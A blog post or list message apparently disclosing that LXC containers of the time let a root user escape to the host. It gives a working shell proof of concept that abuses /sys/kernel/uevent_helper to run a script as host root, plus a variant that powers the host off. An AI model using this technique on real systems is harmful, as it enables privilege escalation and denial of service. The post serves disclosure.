It is very important to understand that not all the pieces are ready
yet, so currently a LXC container does not provide the same security of
other virtualization technologies.
This example shows how the root user of a container can easily run code
as root in the host system, since sysfs does not support namespaces:
lxc$ cat <<END > /tmp/evil-helper
#!/bin/sh
echo 'hi!' >> /tmp/evil-helper.log
END
lxc$ chmod +x /tmp/evil-helper
lxc# mkdir /sys
lxc# mount -t sysfs sysfs /sys
lxc# echo /var/lib/lxc/test/rootfs/tmp/evil-helper >
/sys/kernel/uevent_helper
lxc# echo change > /sys/class/mem/null/uevent
The last command will trigger a uevent, which will be processed by
running in the host our script created inside the container.
Or else:
inside# echo /sbin/poweroff > /sys/kernel/uevent_helper
Because of this, LXC containers are vulnerable to a malicious root user
and are not really a replacement for OpenVZ. This will change when
support for labelling files with user namespaces will be completed.
[0] http://lxc.sourceforge.net/
[1] http://wiki.openvz.org/
Permalink: http://blog.bofh.it/debian/id_413
Best Regards, David